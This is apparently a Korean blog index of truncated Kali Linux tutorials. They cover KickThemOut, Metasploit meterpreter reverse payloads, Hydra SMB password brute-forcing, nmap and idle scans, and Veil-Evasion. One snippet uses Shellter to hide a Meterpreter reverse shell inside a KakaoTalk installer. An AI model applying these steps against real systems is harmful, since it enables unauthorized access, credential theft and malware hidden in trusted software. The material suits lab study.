Kick Them Outfeat.kali linux Kick Them Out 설치 Kick Them Out 툴은 같은 네트워크에 있는 사용자 IP를 차단하는 도구이다. 설치 후 실행 명령은 아래와 같다. root@kali:~# git clone https://github.com/k4m4/kickthemout.gitroot@kali:~# cd kickthemout/root@kali:~/kickthemout# pip3 install scapyroot@kali:~/kickthemout# sudo -H pip3 install -r requirements.txtroot@kali:~/kickthemout# sudo python3 kickthemout.py Kick Them Out 실행 화면 메뉴 [ 1 ] 은 하나..
Metasploit Collabo Shellter Metasploit 으로 payload 생성 DBMS 실행 후 Metasploit 실행 명령. root@kali:~# service postgresql startroot@kali:~# msfconsole Metasploit payload Module 선택 명령. msf > use palyload/windows/meterpreter/reverse_winhttps Module 옵션 선택 명령. msf palyload(windows/meterpreter/reverse_winhttps) > set lhost 192.168.0.xxxlhost => 192.168.0.xxxmsf palyload(windows/meterpreter/reverse_winhttps) >..
KAAIS KAAIS 설치 KAAIS 는 apt-get install programName 명령을통한 프로그램 설치 과정을 자동화 시켜주는 도구이다. [kaaisvs3.sh Git Link] 위 Git 링크에서 Raw 데이터로 변환 후 Source Code를 복사하여 leafpad에 붙여넣고 저장한다. 생성한파일은 실행 권한이 없는 파일 이므로 아래 명령으로 실행 권한을 부여한 후 실행한다. root@kali:~/Desktop# chmod +x kaaisv3.shroot@kali:~/Desktop# ./kaaisv3.sh 실행 권한을 얻은 파일은 아래와 같이 녹색으로 표시된다. root@kali:~/Desktop# lskaaisv3.sh kaais 실행 화면 업데이트 완료 후 메뉴에서 필요한 프로그램을 ..
목차 Hydra 사용법 nmap 을 사용하여 포트 445(microsoft-ds service) 가 열려있는 host PC를 스캔한다. root@kail:~# nmap -p 445 --open 192.168.0.xxx/24 스캔 결과 PC 로그인 ID는 이미 알고 있는 경우 passlist.txt 사전 파일을 이용한 hydra 명령어는 아래와 같다. root@kail:~# hydra -l user -P /root/Desktop/passlist.txt 192.168.0.xxx smb PC 로그인 ID와 PASSWORD를 둘다 모를 경우 loginlist.txt 와 passlist.txt 사전 파일을 이용한 hydra 명령어는 아래와 같다. root@kail:~# hydra -L /root/Desktop/l..
NMAP 사용법 같은 네트워크 상에 연결된 host 들을 PING으로 스캔하는 명령 root@kail:~# nmap -sP 192.168.0.xxx/24 or root@kail:~# nmap -sn 192.168.0.xxx/24 스캔 결과 특정 host의 운영체제를 스캔하는 명령 root@kail:~# nmap -O 192.168.0.xxx 스캔 결과 특정 host의 세부 정보 스캔 root@kail:~# nmap -sC 192.168.0.xxx 스캔 결과 특정 host를 스텔스모드로 모든 정보를 스캔 root@kail:~# nmap -sS -A 192.168.0.xxx 스캔 결과 특정 host에 디코일을 생성하여 생성한 갯수만큼 임의의 IP 주소를 생성하여 스캔패킷을 보내는 명령 root@kail:~#..
TCP idle Scanfeat. Metasploit ipidseq Module Metasploit ipidseq Module 사용 TCP idle Scan 은 Zombi PC의 host를 사용하여 Target host의 PORT를 스캔하는 방식이다. Zombi PC에 적합한 같은 네트워크 라인에 속한 트래픽이 낮은 host를 검색해주는 Metasploit의 ipidseq Module을 사용한다. Metasploit DBMS 동작 명령 root@kail:~# service postgresql start Metasploit 시작 root@kail:~# msfconsole ipidseq Module 선택 msf > use auxiliary/scanner/ip/ipidseq ipidseq options 확인 ..
Custom Payloadfeat. shellter shellter 설치 및 사용 shellter 설치 명령어 root@kali:~# apt-get install shellter shellter 실행 명령어 root@kali:~# shellter shellter 실행 화면 에서 Mode는 Auto 로 선택한 후 미리 받아놓은 카카오톡 PC 버전 설치파일 경로를 입력한다. 설치 중간에 나오는 옵션은 아래와 같이 설정한다. Payload index 1은 Meterpreter_Reverse_TCP 이다. E m a b l e S t e a l t h M o d e ? ( Y / N / H ) : yU s e a l i s t e d p a y l o a d o r c u s t o m ? ( L / C / H..
Veil-Evasion 설치 및 사용feat.kail linux Veil Evasion 설치 git를 아래 명령으로 설치 한다. root@kali:~# apt-get -y install git Veil github link : https://github.com/veil-Framework/Veil git 명령을 이용하여 Veil을 다운로드 한다. root@kali:~# git clone https://githjub.com/Veil-Framework/Veil.git Veil 다운로드 후 파일중에 setup.sh 를 찾아 아래와 같이 실행 시켜준다. (setup.sh 위치는 버전마다 다를 수 있음) root@kali:~/Veil/config# ./setup.sh -c Veil-Evasion 을 사용해 Payl..